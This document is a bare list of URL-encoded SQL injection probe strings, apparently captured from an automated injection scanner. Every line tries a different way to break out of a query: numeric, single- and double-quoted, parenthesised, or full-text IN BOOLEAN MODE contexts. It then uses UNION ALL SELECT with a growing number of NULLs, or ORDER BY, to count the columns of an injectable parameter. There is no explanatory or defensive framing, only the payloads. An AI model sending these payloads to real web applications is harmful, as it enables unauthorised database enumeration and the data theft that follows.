-5800%20%2B%20%28SELECT%202823%20FROM%20DUAL%20WHERE%205986%3D5986%20UNION%20ALL%20SELECT%205986%2C%205986%2C%205986%2C%205986%2C%205986%2C%205986%23%20%29 -4796%20%2B%20%28SELECT%208728%20FROM%20DUAL%20WHERE%202042%3D2042%20UNION%20ALL%20SELECT%202042%2C%202042%2C%202042%2C%202042%2C%202042%2C%202042%2C%202042%23%20%29 -8221%20%2B%20%28SELECT%204625%20FROM%20DUAL%20WHERE%204822%3D4822%20UNION%20ALL%20SELECT%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%23%20%29 -2020%20%2B%20%28SELECT%201031%20FROM%20DUAL%20WHERE%208783%3D8783%20UNION%20ALL%20SELECT%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%23%20%29 -3666%20%2B%20%28SELECT%205333%20FROM%20DUAL%20WHERE%202555%3D2555%20UNION%20ALL%20SELECT%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%23%20%29 -5669%20%2B%20%28SELECT%205623%20WHERE%201025%3D1025%20ORDER%20BY%201%23%20%29 -6049%20%2B%20%28SELECT%202384%20WHERE%202572%3D2572%20ORDER%20BY%203873%23%20%29 -4026%20%2B%20%28SELECT%203889%20WHERE%204750%3D4750%20UNION%20ALL%20SELECT%204750%23%20%29 -8079%20%2B%20%28SELECT%208522%20WHERE%202686%3D2686%20UNION%20ALL%20SELECT%202686%2C%202686%23%20%29 -7924%20%2B%20%28SELECT%202212%20WHERE%208135%3D8135%20UNION%20ALL%20SELECT%208135%2C%208135%2C%208135%23%20%29 -2245%20%2B%20%28SELECT%204315%20WHERE%204503%3D4503%20UNION%20ALL%20SELECT%204503%2C%204503%2C%204503%2C%204503%23%20%29 -9485%20%2B%20%28SELECT%206716%20WHERE%206607%3D6607%20UNION%20ALL%20SELECT%206607%2C%206607%2C%206607%2C%206607%2C%206607%23%20%29 -2376%20%2B%20%28SELECT%204957%20WHERE%209772%3D9772%20UNION%20ALL%20SELECT%209772%2C%209772%2C%209772%2C%209772%2C%209772%2C%209772%23%20%29 -7419%20%2B%20%28SELECT%206884%20WHERE%208251%3D8251%20UNION%20ALL%20SELECT%208251%2C%208251%2C%208251%2C%208251%2C%208251%2C%208251%2C%208251%23%20%29 -9255%20%2B%20%28SELECT%208388%20WHERE%209662%3D9662%20UNION%20ALL%20SELECT%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%2C%209662%23%20%29 -6067%20%2B%20%28SELECT%207577%20WHERE%206305%3D6305%20UNION%20ALL%20SELECT%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%2C%206305%23%20%29 -7325%20%2B%20%28SELECT%204272%20WHERE%202272%3D2272%20UNION%20ALL%20SELECT%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%23%20%29 -1060%27%20%2B%20%28SELECT%20%27oCkX%27%20FROM%20DUAL%20WHERE%204713%3D4713%20ORDER%20BY%201%23%20%29%20%2B%20%27 -5414%27%20%2B%20%28SELECT%20%27bJEp%27%20FROM%20DUAL%20WHERE%207521%3D7521%20ORDER%20BY%209654%23%20%29%20%2B%20%27 -3722%27%20%2B%20%28SELECT%20%27feIR%27%20FROM%20DUAL%20WHERE%209520%3D9520%20UNION%20ALL%20SELECT%209520%23%20%29%20%2B%20%27 -5318%27%20%2B%20%28SELECT%20%27PtMs%27%20FROM%20DUAL%20WHERE%204173%3D4173%20UNION%20ALL%20SELECT%204173%2C%204173%23%20%29%20%2B%20%27 -3472%27%20%2B%20%28SELECT%20%27yrpq%27%20FROM%20DUAL%20WHERE%207787%3D7787%20UNION%20ALL%20SELECT%207787%2C%207787%2C%207787%23%20%29%20%2B%20%27 -6085%27%20%2B%20%28SELECT%20%27Rgpz%27%20FROM%20DUAL%20WHERE%203860%3D3860%20UNION%20ALL%20SELECT%203860%2C%203860%2C%203860%2C%203860%23%20%29%20%2B%20%27 -2392%27%20%2B%20%28SELECT%20%27dKem%27%20FROM%20DUAL%20WHERE%208219%3D8219%20UNION%20ALL%20SELECT%208219%2C%208219%2C%208219%2C%208219%2C%208219%23%20%29%20%2B%20%27 -6333%27%20%2B%20%28SELECT%20%27OAls%27%20FROM%20DUAL%20WHERE%208466%3D8466%20UNION%20ALL%20SELECT%208466%2C%208466%2C%208466%2C%208466%2C%208466%2C%208466%23%20%29%20%2B%20%27 -8463%27%20%2B%20%28SELECT%20%27hQkm%27%20FROM%20DUAL%20WHERE%208578%3D8578%20UNION%20ALL%20SELECT%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%2C%208578%23%20%29%20%2B%20%27 -7848%27%20%2B%20%28SELECT%20%27AUgq%27%20FROM%20DUAL%20WHERE%202261%3D2261%20UNION%20ALL%20SELECT%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%2C%202261%23%20%29%20%2B%20%27 -2590%27%20%2B%20%28SELECT%20%27LVRE%27%20FROM%20DUAL%20WHERE%209473%3D9473%20UNION%20ALL%20SELECT%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%23%20%29%20%2B%20%27 -2810%27%20%2B%20%28SELECT%20%27MuoD%27%20FROM%20DUAL%20WHERE%209233%3D9233%20UNION%20ALL%20SELECT%209233%2C%209233%2C%209233%2C%209233%2C%209233%2C%209233%2C%209233%2C%209233%2C%209233%2C%209233%23%20%29%20%2B%20%27 -7223%27%20%2B%20%28SELECT%20%27HNCh%27%20WHERE%206660%3D6660%20ORDER%20BY%201%23%20%29%20%2B%20%27 -6119%27%20%2B%20%28SELECT%20%27rtxn%27%20WHERE%205858%3D5858%20ORDER%20BY%208226%23%20%29%20%2B%20%27 -4088%27%20%2B%20%28SELECT%20%27ZXdU%27%20WHERE%206064%3D6064%20UNION%20ALL%20SELECT%206064%23%20%29%20%2B%20%27 -5550%27%20%2B%20%28SELECT%20%27UjSH%27%20WHERE%206610%3D6610%20UNION%20ALL%20SELECT%206610%2C%206610%23%20%29%20%2B%20%27 -7388%27%20%2B%20%28SELECT%20%27nTMa%27%20WHERE%202856%3D2856%20UNION%20ALL%20SELECT%202856%2C%202856%2C%202856%23%20%29%20%2B%20%27 -4874%27%20%2B%20%28SELECT%20%27XtHo%27%20WHERE%205642%3D5642%20UNION%20ALL%20SELECT%205642%2C%205642%2C%205642%2C%205642%23%20%29%20%2B%20%27 -3313%27%20%2B%20%28SELECT%20%27CWjA%27%20WHERE%207597%3D7597%20UNION%20ALL%20SELECT%207597%2C%207597%2C%207597%2C%207597%2C%207597%23%20%29%20%2B%20%27 -9834%27%20%2B%20%28SELECT%20%27ZBMJ%27%20WHERE%208908%3D8908%20UNION%20ALL%20SELECT%208908%2C%208908%2C%208908%2C%208908%2C%208908%2C%208908%23%20%29%20%2B%20%27 -1433%27%20%2B%20%28SELECT%20%27Cgab%27%20WHERE%204648%3D4648%20UNION%20ALL%20SELECT%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%2C%204648%23%20%29%20%2B%20%27 -8245%27%20%2B%20%28SELECT%20%27LfFV%27%20WHERE%209064%3D9064%20UNION%20ALL%20SELECT%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%2C%209064%23%20%29%20%2B%20%27 -6301%27%20%2B%20%28SELECT%20%27XfcO%27%20WHERE%204829%3D4829%20UNION%20ALL%20SELECT%204829%2C%204829%2C%204829%2C%204829%2C%204829%2C%204829%2C%204829%2C%204829%2C%204829%23%20%29%20%2B%20%27 -2672%27%20%2B%20%28SELECT%20%27WmNH%27%20WHERE%208014%3D8014%20UNION%20ALL%20SELECT%208014%2C%208014%2C%208014%2C%208014%2C%208014%2C%208014%2C%208014%2C%208014%2C%208014%2C%208014%23%20%29%20%2B%20%27 -6737%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%23%20%23 -8686%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208789%23%20%23 -1365%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203439%23%20%23 -6901%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209761%2C%209761%23%20%23 -7976%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205642%2C%205642%2C%205642%23%20%23 -1400%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207168%2C%207168%2C%207168%2C%207168%23%20%23 -1693%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207388%2C%207388%2C%207388%2C%207388%2C%207388%23%20%23 -7644%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207118%2C%207118%2C%207118%2C%207118%2C%207118%2C%207118%23%20%23 -6956%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208110%2C%208110%2C%208110%2C%208110%2C%208110%2C%208110%2C%208110%23%20%23 -8109%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209789%2C%209789%2C%209789%2C%209789%2C%209789%2C%209789%2C%209789%2C%209789%23%20%23 -2661%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%2C%205340%23%20%23 -3504%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%2C%206894%23%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284753%3D4753 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288548%3D8548 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289853%3D9853 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%283450%3D3450 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284028%3D4028 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%286283%3D6283 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%284388%3D4388 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%288600%3D8600 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289699%3D9699 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%289299%3D9299 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%287890%3D7890 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%281297%3D1297 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%289885%3D9885 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%281552%3D1552 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283835%3D3835 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%283215%3D3215 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%282424%3D2424 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288377%3D8377 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288458%3D8458 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%288542%3D8542 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%289357%3D9357 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%281021%3D1021 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286990%3D6990 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%284818%3D4818 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%282550%3D2550 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%286353%3D6353 